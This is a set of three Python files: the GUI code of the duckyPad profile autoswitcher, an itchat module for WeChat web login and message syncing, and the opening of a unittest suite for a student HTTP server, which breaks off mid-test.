if messagebox.askokcancel("Info", "duckyPad detected, but you need to change some settings to use it.\n\nClick OK to learn how.") is True:
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/app_posix.md')
return
elif init_success is False:
messagebox.showinfo("Info", "Failed to connect to duckyPad")
return
connection_info_str.set("duckyPad connected!")
connection_info_label.config(foreground='navy')
logging.info("duckyPad found!")
try:
result = hid_rw.duckypad_get_info()
connection_info_str.set(f"duckyPad found! Model: {result['model']} Serial: {result['serial']} Firmware: {result['fw_ver']}")
logging.info("has extra info")
if fw_update_checked is False:
print_fw_update_label(result['fw_ver'])
fw_update_checked = True
except Exception as e:
# print(traceback.format_exc())
logging.error(traceback.format_exc())
hid_rw.duckypad_close()
def update_windows(textbox):
# print("def update_windows(textbox):")
logging.info("def update_windows(textbox):")
windows_str = 'Application' + ' '*14 + "Window Title\n"
windows_str += "-------------------------------------\n"
for item in get_window.get_list_of_all_windows():
gap = 25 - len(item[0])
windows_str += str(item[0]) + ' '*gap + str(item[1]) + '\n'
textbox.config(state=NORMAL)
textbox.delete(1.0, "end")
textbox.insert(1.0, windows_str)
textbox.config(state=DISABLED)
def duckypad_write_with_retry(data_buf):
logging.info("def duckypad_write_with_retry(data_buf):")
try:
hid_rw.duckypad_init()
hid_rw.duckypad_hid_write(data_buf)
hid_rw.duckypad_close()
return 0
except Exception as e:
# print(traceback.format_exc())
logging.error("First try: " + str(traceback.format_exc()))
try:
duckypad_connect(show_box=False)
hid_rw.duckypad_init()
hid_rw.duckypad_hid_write(data_buf)
hid_rw.duckypad_close()
return 0
except Exception as e:
logging.error("Second try: " + str(traceback.format_exc()))
return 1
def prev_prof_click():
# print("def prev_prof_click():")
logging.info("def prev_prof_click():")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 2
duckypad_write_with_retry(buffff)
def next_prof_click():
# print("def next_prof_click():")
logging.info("def next_prof_click():")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 3
duckypad_write_with_retry(buffff)
root = Tk()
root.title("duckyPad autoswitcher " + THIS_VERSION_NUMBER)
root.geometry(str(MAIN_WINDOW_WIDTH) + "x" + str(MAIN_WINDOW_HEIGHT))
root.resizable(width=FALSE, height=FALSE)
# --------------------
connection_info_str = StringVar()
connection_info_str.set("<--- Press Connect button")
connection_info_lf = LabelFrame(root, text="Connection", width=620, height=60)
connection_info_lf.place(x=PADDING, y=0)
connection_info_label = Label(master=connection_info_lf, textvariable=connection_info_str)
connection_info_label.place(x=110, y=5)
connection_info_label.config(foreground='orange red')
connection_button = Button(connection_info_lf, text="Connect", command=duckypad_connect)
connection_button.config(width=11, height=1)
connection_button.place(x=PADDING, y=5)
# --------------------
discord_link_url = "https://raw.githubusercontent.com/dekuNukem/duckyPad/master/resources/discord_link.txt"
def open_user_manual():
# print("def open_user_manual():")
logging.info("def open_user_manual():")
webbrowser.open('https://github.com/dekuNukem/duckyPad-profile-autoswitcher#user-manual')
def open_discord():
# print("def open_discord():")
logging.info("def open_discord():")
try:
webbrowser.open(str(urllib.request.urlopen(discord_link_url).read().decode('utf-8')).split('\n')[0])
except Exception as e:
messagebox.showerror("Error", "Failed to open discord link!\n"+str(e))
def refresh_autoswitch():
# print("def refresh_autoswitch():")
logging.info("def refresh_autoswitch():")
if config_dict['autoswitch_enabled']:
autoswitch_status_var.set("Profile Autoswitch: ACTIVE Click me to stop")
autoswitch_status_label.config(fg='white', bg='green', cursor="hand2")
else:
autoswitch_status_var.set("Profile Autoswitch: STOPPED Click me to start")
autoswitch_status_label.config(fg='white', bg='orange red', cursor="hand2")
def toggle_autoswitch(whatever):
# print("def toggle_autoswitch(whatever):")
logging.info("def toggle_autoswitch(whatever):")
config_dict['autoswitch_enabled'] = not config_dict['autoswitch_enabled']
save_config()
refresh_autoswitch()
def open_save_folder():
# print("def open_save_folder():")
logging.info("def open_save_folder():")
messagebox.showinfo("Info", "* Copy config.txt elsewhere to make a backup!\n\n* Close the app then copy it back to restore.")
if 'darwin' in sys.platform:
subprocess.Popen(["open", save_path])
elif 'linux' in sys.platform:
subprocess.Popen(["xdg-open", save_path])
else:
webbrowser.open(save_path)
dashboard_lf = LabelFrame(root, text="Dashboard", width=620, height=95)
dashboard_lf.place(x=PADDING, y=60)
prev_profile_button = Button(dashboard_lf, text="Prev Profile", command=prev_prof_click)
prev_profile_button.config(width=11, height=1)
prev_profile_button.place(x=410, y=5)
next_profile_button = Button(dashboard_lf, text="Next Profile", command=next_prof_click)
next_profile_button.config(width=11, height=1)
next_profile_button.place(x=510, y=5)
user_manual_button = Button(dashboard_lf, text="User Manual", command=open_user_manual)
user_manual_button.config(width=11, height=1)
user_manual_button.place(x=PADDING, y=5)
discord_button = Button(dashboard_lf, text="Discord", command=open_discord)
discord_button.config(width=11, height=1)
discord_button.place(x=110, y=5)
discord_button = Button(dashboard_lf, text="Backup", command=open_save_folder)
discord_button.config(width=11, height=1)
discord_button.place(x=210, y=5)
autoswitch_status_var = StringVar()
autoswitch_status_label = Label(master=dashboard_lf, textvariable=autoswitch_status_var, font='TkFixedFont', cursor="hand2")
autoswitch_status_label.place(x=10, y=40)
autoswitch_status_label.bind("<Button-1>", toggle_autoswitch)
# --------------------
current_app_name_var = StringVar()
current_app_name_var.set("Current app name:")
current_window_title_var = StringVar()
current_window_title_var.set("Current Window Title:")
last_hid_profile = None
def duckypad_goto_profile(profile_number):
global last_hid_profile
if profile_number is None:
return
if not 1 <= profile_number <= 31:
return
if profile_number == last_hid_profile:
return
# print("def duckypad_goto_profile(profile_number):")
logging.info("def duckypad_goto_profile(profile_number):")
buffff = [0] * 64
buffff[0] = 5
buffff[2] = 1
buffff[3] = profile_number
duckypad_write_with_retry(buffff)
last_hid_profile = profile_number
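# As inferred from the HID-writing helpers above (not from a published
# protocol spec): each command is a 64-byte report where byte 0 is the command
# type (5 = profile control), byte 2 is the action (1 = goto profile,
# 2 = previous profile, 3 = next profile), and byte 3 carries the target
# profile number for the goto action.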
profile_switch_queue = None
def t1_worker():
# print("def t1_worker():")
logging.info("def t1_worker():")
    while True:
duckypad_goto_profile(profile_switch_queue)
time.sleep(0.033)
def update_current_app_and_title():
# print("def update_current_app_and_title():")
# logging.info("def update_current_app_and_title():")
# logging.info(".")
global profile_switch_queue
root.after(250, update_current_app_and_title)
# if hid_rw.is_hid_open is False and button_pressed is True:
# connection_info_str.set("duckyPad not found")
# connection_info_label.config(foreground='red')
app_name, window_title = get_window.get_active_window()
current_app_name_var.set("App name: " + str(app_name))
current_window_title_var.set("Window title: " + str(window_title))
if rule_window is not None and rule_window.winfo_exists():
return
if config_dict['autoswitch_enabled'] is False:
return
highlight_index = None
for index, item in enumerate(config_dict['rules_list']):
if item['enabled'] is False:
continue
app_name_condition = True
if len(item['app_name']) > 0:
app_name_condition = item['app_name'].lower() in app_name.lower()
window_title_condition = True
if len(item['window_title']) > 0:
window_title_condition = item['window_title'].lower() in window_title.lower()
if app_name_condition and window_title_condition:
profile_switch_queue = item['switch_to']
highlight_index = index
break
for index, item in enumerate(config_dict['rules_list']):
if index == highlight_index:
profile_lstbox.itemconfig(index, fg='white', bg='green')
else:
profile_lstbox.itemconfig(index, fg='black', bg='white')
# ----------------
app_name_entrybox = None
window_name_entrybox = None
switch_to_entrybox = None
config_dict = {}
config_dict['rules_list'] = []
config_dict['autoswitch_enabled'] = True
def clean_input(str_input):
# print("def clean_input(str_input):")
logging.info("def clean_input(str_input):")
return str_input.strip()
def check_profile_number(raw_str):
# print("def check_profile_number(raw_str):")
logging.info("def check_profile_number(raw_str):")
try:
profile_number = int(clean_input(raw_str))
except Exception:
return None
if 1 <= profile_number <= 31:
return profile_number
return None
def make_rule_str(rule_dict):
# print("def make_rule_str(rule_dict):")
logging.info("def make_rule_str(rule_dict):")
rule_str = ''
if rule_dict['enabled']:
rule_str += " * "
else:
rule_str += " "
if len(rule_dict['app_name']) > 0:
rule_str += " " + rule_dict['app_name']
else:
rule_str += " " + "[Any]"
next_item = rule_dict['window_title']
if len(next_item) <= 0:
next_item = "[Any]"
gap = 29 - len(rule_str)
rule_str += ' '*gap + next_item
gap = 58 - len(rule_str)
rule_str += ' '*gap + str(rule_dict['switch_to'])
return rule_str
def update_rule_list_display():
# print("def update_rule_list_display():")
logging.info("def update_rule_list_display():")
profile_var.set([make_rule_str(x) for x in config_dict['rules_list']])
def save_config():
# print("def save_config():")
logging.info("def save_config():")
try:
ensure_dir(save_path)
with open(save_filename, 'w', encoding='utf8') as save_file:
save_file.write(json.dumps(config_dict, sort_keys=True))
except Exception as e:
messagebox.showerror("Error", "Save failed!\n\n"+str(traceback.format_exc()))
def save_rule_click(window, this_rule):
# print("def save_rule_click(window, this_rule):")
logging.info("def save_rule_click(window, this_rule):")
if this_rule is None:
rule_dict = {}
rule_dict["app_name"] = clean_input(app_name_entrybox.get())
rule_dict["window_title"] = clean_input(window_name_entrybox.get())
rule_dict["switch_to"] = check_profile_number(switch_to_entrybox.get())
rule_dict["enabled"] = True
if rule_dict not in config_dict['rules_list']:
config_dict['rules_list'].append(rule_dict)
update_rule_list_display()
save_config()
window.destroy()
elif this_rule is not None:
this_rule["app_name"] = clean_input(app_name_entrybox.get())
this_rule["window_title"] = clean_input(window_name_entrybox.get())
this_rule["switch_to"] = check_profile_number(switch_to_entrybox.get())
update_rule_list_display()
save_config()
window.destroy()
rule_window = None
def create_rule_window(existing_rule=None):
# print("def create_rule_window(existing_rule=None):")
logging.info("def create_rule_window(existing_rule=None):")
global rule_window
global app_name_entrybox
global window_name_entrybox
global switch_to_entrybox
rule_window = Toplevel(root)
rule_window.title("Edit rules")
rule_window.geometry("640x510")
rule_window.resizable(width=FALSE, height=FALSE)
rule_window.grab_set()
rule_edit_lf = LabelFrame(rule_window, text="Rules", width=620, height=130)
rule_edit_lf.place(x=10, y=5)
app_name_label = Label(master=rule_window, text="IF app name contains:")
app_name_label.place(x=20, y=25)
app_name_entrybox = Entry(rule_window)
app_name_entrybox.place(x=230, y=25, width=200)
window_name_label = Label(master=rule_window, text="AND window title contains:")
window_name_label.place(x=20, y=50)
window_name_entrybox = Entry(rule_window)
window_name_entrybox.place(x=230, y=50, width=200)
switch_to_label = Label(master=rule_window, text="THEN switch to profile #")
switch_to_label.place(x=20, y=75)
switch_to_entrybox = Entry(rule_window)
switch_to_entrybox.place(x=230, y=75, width=200)
if existing_rule is not None:
app_name_entrybox.insert(0, existing_rule["app_name"])
window_name_entrybox.insert(0, existing_rule["window_title"])
if existing_rule["switch_to"] is None:
switch_to_entrybox.insert(0, "")
else:
switch_to_entrybox.insert(0, str(existing_rule["switch_to"]))
rule_done_button = Button(rule_edit_lf, text="Save", command=lambda:save_rule_click(rule_window, existing_rule))
rule_done_button.config(width=75, height=1)
rule_done_button.place(x=40, y=80)
match_all_label = Label(master=rule_window, text="(leave blank to match all)")
match_all_label.place(x=450, y=25)
match_all_label2 = Label(master=rule_window, text="(leave blank to match all)")
match_all_label2.place(x=450, y=50)
match_all_label3 = Label(master=rule_window, text="(leave blank for no action)")
match_all_label3.place(x=450, y=75)
current_window_lf = LabelFrame(rule_window, text="Active window", width=620, height=80)
current_window_lf.place(x=PADDING, y=110+30)
current_app_name_label = Label(master=current_window_lf, textvariable=current_app_name_var, font='TkFixedFont')
current_app_name_label.place(x=10, y=5)
current_window_title_label = Label(master=current_window_lf, textvariable=current_window_title_var, font='TkFixedFont')
current_window_title_label.place(x=10, y=30)
window_list_lf = LabelFrame(rule_window, text="All windows", width=620, height=270)
window_list_lf.place(x=PADDING, y=195+30)
window_list_fresh_button = Button(window_list_lf, text="Refresh", command=lambda:update_windows(windows_list_text_area))
window_list_fresh_button.config(width=80, height=1)
window_list_fresh_button.place(x=20, y=220)
windows_list_text_area = ScrolledText.ScrolledText(window_list_lf, wrap='none', width = 73, height = 13)
windows_list_text_area.place(x=5, y=5)
root.update()
update_windows(windows_list_text_area)
def delete_rule_click():
# print("def delete_rule_click():")
logging.info("def delete_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
config_dict['rules_list'].pop(selection[0])
update_rule_list_display()
save_config()
def edit_rule_click():
# print("def edit_rule_click():")
logging.info("def edit_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
create_rule_window(config_dict['rules_list'][selection[0]])
def toggle_rule_click():
# print("def toggle_rule_click():")
logging.info("def toggle_rule_click():")
selection = profile_lstbox.curselection()
if len(selection) <= 0:
return
config_dict['rules_list'][selection[0]]['enabled'] = not config_dict['rules_list'][selection[0]]['enabled']
update_rule_list_display()
save_config()
def rule_shift_up():
# print("def rule_shift_up():")
logging.info("def rule_shift_up():")
selection = profile_lstbox.curselection()
if len(selection) <= 0 or selection[0] == 0:
return
source = selection[0]
destination = selection[0] - 1
config_dict['rules_list'][destination], config_dict['rules_list'][source] = config_dict['rules_list'][source], config_dict['rules_list'][destination]
update_rule_list_display()
profile_lstbox.selection_clear(0, len(config_dict['rules_list']))
profile_lstbox.selection_set(destination)
update_rule_list_display()
save_config()
def rule_shift_down():
# print("def rule_shift_down():")
logging.info("def rule_shift_down():")
selection = profile_lstbox.curselection()
if len(selection) <= 0 or selection[0] == len(config_dict['rules_list']) - 1:
return
source = selection[0]
destination = selection[0] + 1
config_dict['rules_list'][destination], config_dict['rules_list'][source] = config_dict['rules_list'][source], config_dict['rules_list'][destination]
update_rule_list_display()
profile_lstbox.selection_clear(0, len(config_dict['rules_list']))
profile_lstbox.selection_set(destination)
update_rule_list_display()
save_config()
rules_lf = LabelFrame(root, text="Autoswitch rules", width=620, height=410)
rules_lf.place(x=PADDING, y=160)
profile_var = StringVar()
profile_lstbox = Listbox(rules_lf, listvariable=profile_var, height=20, exportselection=0)
profile_lstbox.place(x=PADDING, y=30, width=500)
profile_lstbox.config(font='TkFixedFont')
profile_lstbox.bind('<FocusOut>', lambda e: profile_lstbox.selection_clear(0, END))
rule_header_label = Label(master=rules_lf, text="Enabled App name Window Title Profile", font='TkFixedFont')
rule_header_label.place(x=5, y=5)
new_rule_button = Button(rules_lf, text="New rule...", command=create_rule_window)
new_rule_button.config(width=11, height=1)
new_rule_button.place(x=520, y=30)
edit_rule_button = Button(rules_lf, text="Edit rule...", command=edit_rule_click)
edit_rule_button.config(width=11, height=1)
edit_rule_button.place(x=520, y=70)
move_up_button = Button(rules_lf, text="Move up", command=rule_shift_up)
move_up_button.config(width=11, height=1)
move_up_button.place(x=520, y=150)
toggle_rule_button = Button(rules_lf, text="On/Off", command=toggle_rule_click)
toggle_rule_button.config(width=11, height=1)
toggle_rule_button.place(x=520, y=190)
move_down_button = Button(rules_lf, text="Move down", command=rule_shift_down)
move_down_button.config(width=11, height=1)
move_down_button.place(x=520, y=230)
delete_rule_button = Button(rules_lf, text="Delete rule", command=delete_rule_click)
delete_rule_button.config(width=11, height=1)
delete_rule_button.place(x=520, y=300)
try:
with open(save_filename) as json_file:
temp = json.load(json_file)
if isinstance(temp, list):
config_dict['rules_list'] = temp
elif isinstance(temp, dict):
config_dict = temp
else:
raise ValueError("not a valid config file")
update_rule_list_display()
except Exception as e:
# print(traceback.format_exc())
logging.error(traceback.format_exc())
refresh_autoswitch()
# ------------------
def fw_update_click(what):
# print("def fw_update_click(what):")
logging.info("def fw_update_click(what):")
webbrowser.open('https://github.com/dekuNukem/duckyPad/blob/master/firmware_updates_and_version_history.md')
def app_update_click(event):
# print("def app_update_click(event):")
logging.info("def app_update_click(event):")
webbrowser.open('https://github.com/dekuNukem/duckyPad-profile-autoswitcher/releases')
def print_fw_update_label(this_version):
# print("def print_fw_update_label(this_version):")
logging.info("def print_fw_update_label(this_version):")
fw_result = check_update.get_firmware_update_status(this_version)
if fw_result == 0:
dp_fw_update_label.config(text='duckyPad firmware (' + str(this_version) +'): Up to date', fg='black', bg=default_button_color)
dp_fw_update_label.unbind("<Button-1>")
elif fw_result == 1:
dp_fw_update_label.config(text='duckyPad firmware (' + str(this_version) +'): Update available! Click me!', fg='black', bg='orange', cursor="hand2")
dp_fw_update_label.bind("<Button-1>", fw_update_click)
else:
dp_fw_update_label.config(text='duckyPad firmware: Unknown', fg='black', bg=default_button_color)
dp_fw_update_label.unbind("<Button-1>")
updates_lf = LabelFrame(root, text="Updates", width=620, height=80)
updates_lf.place(x=PADDING, y=570)
pc_app_update_label = Label(master=updates_lf)
pc_app_update_label.place(x=5, y=5)
update_stats = check_update.get_pc_app_update_status(THIS_VERSION_NUMBER)
if update_stats == 0:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Up to date', fg='black', bg=default_button_color)
pc_app_update_label.unbind("<Button-1>")
elif update_stats == 1:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Update available! Click me!', fg='black', bg='orange', cursor="hand2")
pc_app_update_label.bind("<Button-1>", app_update_click)
else:
pc_app_update_label.config(text='This app (' + str(THIS_VERSION_NUMBER) + '): Unknown', fg='black', bg=default_button_color)
pc_app_update_label.unbind("<Button-1>")
dp_fw_update_label = Label(master=updates_lf, text="duckyPad firmware: Unknown")
dp_fw_update_label.place(x=5, y=30)
# ------------------
t1 = threading.Thread(target=t1_worker, daemon=True)
t1.start()
root.after(250, update_current_app_and_title)
root.mainloop()
|
login.py
|
import os, sys, time, re
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from .. import config, utils
from ..returnvalues import ReturnValue
from .contact import update_local_chatrooms
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None,
loginCallback=None, exitCallback=None):
if self.alive:
logger.debug('itchat has already logged in.')
return
while 1:
for getCount in range(10):
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid(): time.sleep(1)
logger.info('Downloading QR code.')
if self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir):
break
elif 9 == getCount:
logger.info('Failed to get QR code, please restart the program.')
sys.exit()
logger.info('Please scan the QR code to log in.')
status = self.check_login()
if status == '201':
logger.info('Please press confirm on your phone.')
while status == '201':
status = self.check_login()
time.sleep(1)
if status == '200': break
        logger.info('Login timed out, reloading QR code')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
os.remove(picDir or config.DEFAULT_QR)
        logger.info('Logged in successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None):
try:
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
url = '%s/qrcode/%s' % (config.BASE_URL, uuid)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, stream=True, headers=headers)
with open(picDir, 'wb') as f: f.write(r.content)
except:
return False
if enableCmdQR:
utils.print_cmd_qr(picDir, enableCmdQR = enableCmdQR)
else:
utils.print_qr(picDir)
return True
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
params = 'tip=1&uuid=%s&_=%s' % (uuid, int(time.time()))
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data and data.group(1) == '201':
return '201'
elif data and data.group(1) == '408':
return '408'
else:
return '0'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['msgid'] = int(time.time() * 1000)
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = utils.struct_friend_info(dic['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
continue
else:
msgList, contactList = self.get_msg()
if contactList:
chatroomMsg = update_local_chatrooms(self, contactList)
self.msgList.put(chatroomMsg)
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList: self.msgList.put(msg)
retryCount = 0
except:
retryCount += 1
logger.debug(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
maintainThread = threading.Thread(target = maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.s.cookies.clear()
del self.chatroomList[:]
# other info will be automatically cleared
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
tests.py
|
"""Tests for the HTTP server
To run the tests simply issue:
python tests.py
To create (or delete) an example database of users, use the following command:
$ python tests.py create_db
or
$ python tests.py delete_db
"""
import socket
import sys
import time
import unittest
from multiprocessing import Process
from os import remove
from random import randint
from urllib.request import urlopen
from server import *
MISSING_REQUESTS = """[WARNING] Your system is missing the Requests package.
Requests is a Python library that greatly simplifies writing HTTP requests
and parsing HTTP responses. (Even NSA is supposedly using it; you should be
too.) Visit Requests homepage for installation instructions:
http://docs.python-requests.org
In most systems, the installation only requires that you open your command
prompt and write the following command:
pip install requests
Note that you can still issue HTTP requests and parse HTTP responses without
the Requests library, but you'll have to write a lot more code. Below, you'll
find an example of a test that does not use the Request library; it uses the
built-in package 'urllib' and the 'urlopen(str)' function. The name of the test
is 'test_get_root_index_urlopen'.
Also note that the test 'test_get_root_index_requests' which currently uses the
Requests package will fail, until you install the package (or remove the test).
"""
try:
import requests
except ImportError:
print('\033[91m' + '\033[1m' + MISSING_REQUESTS + '\033[0m')
DATA = [{"number": 1, "first": "alice", "last": "cooper"},
{"number": 2, "first": "bob", "last": "marley"},
{"number": 3, "first": "bob", "last": "dylan"},
{"number": 4, "first": "charlie", "last": "pooth"},
{"number": 5, "first": "david", "last": "bowie"}]
class ServerTest(unittest.TestCase):
"""Unit tests for the Python HTTP server.
You are highly encouraged to write additional tests."""
def setUp(self):
"""Runs before very test. Do not modify."""
self.host = "127.0.0.1"
self.port = randint(30000, 50000)
self.server = "http://%s:%d" % (self.host, self.port)
self.process = Process(target=main, args=(self.port,))
self.process.daemon = True
self.process.start()
self.remove_file(PICKLE_DB)
time.sleep(0.01)
def remove_file(self, filename):
"""Remove the DB (pickle) file. Do not to modify."""
try:
remove(filename)
except OSError:
pass
def tearDown(self):
"""Runs after very test. Do not to modify."""
self.process.terminate()
self.remove_file(PICKLE_DB)
def prepare_db_data(self):
"""Prepares some DB data and saves it to the DB"""
for item in DATA:
save_to_db(item["first"], item["last"])
# A helper method to send raw data over a TCP socket
# You can find a usage example below
def _manual_request(self, payload):
"""Sends a raw request over a TCP socket."""
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(0.25)
client.connect((self.host, self.port))
client.sendall(payload.encode("UTF-8"))
response = client.recv(8192).decode("UTF-8")
client.close()
return response
##################################################################
# UNIT TESTS
#
# These tests check whether small chunks of your code (functions)
# work correctly. They should help you build and ensure the
# well-functioning of smaller units of your code. For instance,
# a unit test can check whether your parse_header function (if you
# decide to write one) works correctly.
#
# A few examples are provided below, but you should write many
# more yourself.
##################################################################
def test_db_writes_and_reads(self):
"""Data should persist in the DB"""
self.prepare_db_data()
for original, read in zip(DATA, read_from_db()):
self.assertEqual(original, read)
def test_db_filter_single(self):
"""DB should be filterable by either number, first or last name"""
self.prepare_db_data()
entry = read_from_db({"number": 1})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["number"], 1)
entries = read_from_db({"first": "bob"})
self.assertEqual(len(entries), 2)
for entry in entries:
self.assertEqual(entry["first"], "bob")
self.assertTrue(entry["last"] in ("dylan", "marley"))
entry = read_from_db({"last": "cooper"})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["last"], "cooper")
def test_db_filter_combined(self):
"""DB should be filterable by last and first name"""
self.prepare_db_data()
entry = read_from_db({"first": "alice", "last": "cooper"})
self.assertEqual(len(entry), 1)
self.assertEqual(entry[0]["first"], "alice")
self.assertEqual(entry[0]["last"], "cooper")
# Add your unit tests below.
# Below is an example of a function that parses the request line
def test_parse_request_line1(self):
"""Parse request line 'GET / HTTP/1.1'"""
method, uri, protocol, params = parse_request_line("GET / HTTP/1.1")
self.assertEqual(method, "GET")
self.assertEqual(uri, "/")
self.assertEqual(protocol, "HTTP/1.1")
self.assertEqual(params, {})
def test_parse_request_line_params(self):
"""Parse request line 'GET /demo_form.php?name1=value HTTP/1.1'"""
